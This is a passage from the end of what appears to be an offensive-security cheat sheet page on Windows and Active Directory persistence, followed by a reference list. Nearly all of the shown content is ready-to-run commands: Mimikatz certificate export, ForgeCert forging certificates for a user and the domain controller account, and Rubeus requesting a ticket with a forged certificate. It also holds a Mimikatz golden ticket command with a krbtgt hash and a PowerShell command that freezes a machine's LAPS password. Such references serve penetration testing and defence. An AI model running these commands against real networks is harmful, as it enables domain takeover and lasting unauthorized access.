<a id="__codelineno-35-2" name="__codelineno-35-2" href="#__codelineno-35-2"></a><span class="n">crypto</span><span class="p">::</span><span class="n">capi</span>
<a id="__codelineno-35-3" name="__codelineno-35-3" href="#__codelineno-35-3"></a><span class="n">crypto</span><span class="p">::</span><span class="n">cng</span>
<a id="__codelineno-35-4" name="__codelineno-35-4" href="#__codelineno-35-4"></a><span class="n">crypto</span><span class="p">::</span><span class="n">certificates</span> <span class="p">/</span><span class="n">systemstore</span><span class="p">:</span><span class="n">local_machine</span> <span class="p">/</span><span class="n">store</span><span class="p">:</span><span class="n">my</span> <span class="p">/</span><span class="n">export</span>
</code></pre></div></li>
<li>Alternative 2: Use SharpDPAPI, then convert the certificate: <code>openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx</code></li>
<li><a href="https://github.com/GhostPack/ForgeCert">ForgeCert</a> - Forge a certificate for any active domain user using the CA certificate
<div class="highlight"><pre><span></span><code><a id="__codelineno-36-1" name="__codelineno-36-1" href="#__codelineno-36-1"></a><span class="n">ForgeCert</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-CaCertPath</span> <span class="n">ca</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-CaCertPassword</span> <span class="n">Password123</span> <span class="p">-</span><span class="n">-Subject</span> <span class="n">CN</span><span class="p">=</span><span class="n">User</span> <span class="p">-</span><span class="n">-SubjectAltName</span> <span class="n">harry</span><span class="nv">@lab</span><span class="p">.</span><span class="n">local</span> <span class="p">-</span><span class="n">-NewCertPath</span> <span class="n">harry</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-NewCertPassword</span> <span class="n">Password123</span>
<a id="__codelineno-36-2" name="__codelineno-36-2" href="#__codelineno-36-2"></a><span class="n">ForgeCert</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-CaCertPath</span> <span class="n">ca</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-CaCertPassword</span> <span class="n">Password123</span> <span class="p">-</span><span class="n">-Subject</span> <span class="n">CN</span><span class="p">=</span><span class="n">User</span> <span class="p">-</span><span class="n">-SubjectAltName</span> <span class="n">DC</span><span class="p">$</span><span class="nv">@lab</span><span class="p">.</span><span class="n">local</span> <span class="p">-</span><span class="n">-NewCertPath</span> <span class="n">dc</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-NewCertPassword</span> <span class="n">Password123</span>
</code></pre></div></li>
<li>Finally, you can request a TGT using the certificate
<div class="highlight"><pre><span></span><code><a id="__codelineno-37-1" name="__codelineno-37-1" href="#__codelineno-37-1"></a><span class="n">Rubeus</span><span class="p">.</span><span class="n">exe</span> <span class="n">asktgt</span> <span class="p">/</span><span class="n">user</span><span class="p">:</span><span class="n">ron</span> <span class="p">/</span><span class="n">certificate</span><span class="p">:</span><span class="n">harry</span><span class="p">.</span><span class="n">pfx</span> <span class="p">/</span><span class="n">password</span><span class="p">:</span><span class="n">Password123</span>
</code></pre></div></li>
</ul>
<h3 id="golden-ticket">Golden Ticket</h3>
<blockquote>
<p>Forge a Golden Ticket using Mimikatz</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-38-1" name="__codelineno-38-1" href="#__codelineno-38-1"></a><span class="n">kerberos</span><span class="p">::</span><span class="n">purge</span>
<a id="__codelineno-38-2" name="__codelineno-38-2" href="#__codelineno-38-2"></a><span class="n">kerberos</span><span class="p">::</span><span class="n">golden</span> <span class="p">/</span><span class="n">user</span><span class="p">:</span><span class="n">evil</span> <span class="p">/</span><span class="n">domain</span><span class="p">:</span><span class="n">pentestlab</span><span class="p">.</span><span class="n">local</span> <span class="p">/</span><span class="n">sid</span><span class="p">:</span><span class="n">S</span><span class="p">-</span><span class="n">1</span><span class="p">-</span><span class="n">5</span><span class="p">-</span><span class="n">21</span><span class="p">-</span><span class="n">3737340914</span><span class="p">-</span><span class="n">2019594255</span><span class="p">-</span><span class="n">2413685307</span> <span class="p">/</span><span class="n">krbtgt</span><span class="p">:</span><span class="n">d125e4f69c851529045ec95ca80fa37e</span> <span class="p">/</span><span class="n">ticket</span><span class="p">:</span><span class="n">evil</span><span class="p">.</span><span class="n">tck</span> <span class="p">/</span><span class="n">ptt</span>
<a id="__codelineno-38-3" name="__codelineno-38-3" href="#__codelineno-38-3"></a><span class="n">kerberos</span><span class="p">::</span><span class="n">tgt</span>
</code></pre></div>
<h3 id="laps-persistence">LAPS Persistence</h3>
<p>To prevent a machine from updating its LAPS password, it is possible to set the password expiration time to a date in the future.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-39-1" name="__codelineno-39-1" href="#__codelineno-39-1"></a><span class="nb">Set-DomainObject</span> <span class="n">-Identity</span> <span class="p">&lt;</span><span class="n">target_machine</span><span class="p">&gt;</span> <span class="n">-Set</span> <span class="p">@{</span><span class="s2">&quot;ms-mcs-admpwdexpirationtime&quot;</span><span class="p">=</span><span class="s2">&quot;232609935231523081&quot;</span><span class="p">}</span>
</code></pre></div>
<h2 id="references">References</h2>
<ul>
<li><a href="http://pwnwiki.io/#!persistence/windows/index.md">Windows Persistence Commands - Pwn Wiki</a></li>
<li><a href="http://www.youtube.com/watch?v=K7o9RSVyazo">SharPersist Windows Persistence Toolkit in C - Brett Hawkins</a></li>
<li><a href="https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/">IIS Raid Backdooring IIS Using Native Modules - 19/02/2020</a></li>
<li><a href="https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html">Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa</a></li>
<li><a href="https://github.com/netbiosX/Checklists/blob/master/Persistence.md">Persistence - Checklist - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/">Persistence Winlogon Helper DLL - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2019/10/30/persistence-bits-jobs/">Persistence - BITS Jobs - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/">Persistence Image File Execution Options Injection - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/">Persistence Registry Run Keys - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2021/11/15/golden-certificate/">Golden Certificate - NOVEMBER 15, 2021</a></li>
<li><a href="https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/">Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi</a></li>
<li><a href="https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html">Persistence via WMI Event Subscription - Elastic Security Solution</a></li>
<li><a href="https://0xv1n.github.io/posts/scmanager/">PrivEsc: Abusing the Service Control Manager for Stealthy &amp; Persistent LPE - 0xv1n - 2023-02-27</a></li>
<li><a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)">Sc sdset - Microsoft - 08/31/2016</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 9, 2024</span>
</span>
</aside>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
</main>
</div>
<script id="__config" type="application/json">{"base": "../../..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../../../assets/javascripts/bundle.83f73b43.min.js"></script>
</body>
</html>